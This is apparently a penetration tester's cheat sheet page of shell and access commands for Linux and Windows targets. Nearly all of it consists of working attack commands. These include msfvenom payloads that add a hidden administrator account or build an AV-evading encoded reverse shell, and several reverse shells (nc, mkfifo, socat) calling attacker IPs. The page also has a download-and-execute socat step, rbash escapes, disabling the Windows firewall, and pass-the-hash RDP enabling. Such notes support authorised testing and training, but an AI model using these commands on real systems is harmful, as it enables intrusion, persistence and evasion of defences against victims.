Common Operations (tty, SSH, rbash)

chown chmod su ; windows prefer C:\ instead of /

rdp


proxychains xfreerdp /d:sandbox(.local) /u:alex /p:'xxx' /v:10.5.5.20 +clipboard +drives /tls-seclevel:0

/pth:hash <-> /p:'pwd'

sudo crackmapexec smb 10.69.88.23 -u user -p password -M rdp -o ACTION=enable
(-H nthash)

Check "File transfer" for drive share

Setup nc listener with a opened port from nmap to avoid firewall block from victim


msfvenom -p windows/exec CMD="cmd.exe /c net user /add pwn pwd && net localgroup administrators pwn /add && net localgroup \"Remote Desktop Users\" pwn /add" -a x86 -f exe --platform windows > X.exe

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.119.173 LPORT=80 -e x86/shikata_ga_nai -i 7 -f raw -o shell.bin
#shellter custom payload to avoid av
shellter A > N > C > .bin > N

TTY interactive shell

/usr/bin/script -qc /bin/bash /dev/null

python2 -c 'import pty;pty.spawn("/bin/bash")'

python3 -c 'import pty;pty.spawn("/bin/bash")'

python -c 'import pty; pty.spawn("/bin/sh")'

full interactive

Upgrading Simple Shells to Fully Interactive TTYsropnop blog

Pentest-Cheatsheets/privilege-escalation/linux/gaining-tty.rst at master · Tib3rius/Pentest-CheatsheetsGitHub

socat

#Listener:
socat file:`tty`,raw,echo=0 tcp-listen:4444

#Victim:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.119.125:143

wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat
wget -q http://192.168.119.125/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.119.125:143

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.45.185 4444 >/tmp/f

mknod /tmp/backpipe p
/bin/sh 0</tmp/backpipe | nc attacker_ip 4444 1>/tmp/backpipe

nc attkip attkport -e /bin/sh

# In reverse shell
$ python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z

# In Kali
$ echo $TERM; stty size; stty raw -echo; fg #note the value
#*enter*2

# In reverse shell
$ reset
# 
$ export SHELL=bash
$ export TERM=xterm-256color #value from b4
$ stty rows <num> columns <cols> #value from b4

PATH and SHELL fix


export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
export SHELL=/bin/bash:$SHELL

#prioritized /tmp script path
export PATH=/tmp:$PATH

.c compiling

add -static if version GLIBC not found error

gcc ###.c -o {outputname}

# old glibc compatibility 
gcc (-m32) -Wl,--hash-style=both (-static) -o exploit ###.c

Compatible SSH

ssh [email protected] -p 22 -o KexAlgorithms=+diffie-hellman-group1-sha1 -o HostKeyAlgorithms=+ssh-rsa

Interactive session (escape rbash)

ssh [email protected] -t "bash --noprofile" 

find /usr/bin/ -name find -exec /bin/bash -ip \; 

ls $PATH (for available commands)

vi
:shell=/bin/sh
:shell

Windows short path when can't use ""

How can I find the short path of a Windows directory/file?Super User

Windows firewall

netsh advfirewall set allprofiles state off
netsh advfirewall set allprofiles state on

reboot

shutdown -r -t 10

NextLinux commands

Last updated 1 year ago

hashtagrdp

hashtagTTY interactive shell

hashtagfull interactive

hashtagPATH and SHELL fix

hashtag.c compiling

hashtagCompatible SSH

hashtagInteractive session (escape rbash)

hashtagWindows short path when can't use ""

hashtagWindows firewall

hashtagreboot

rdp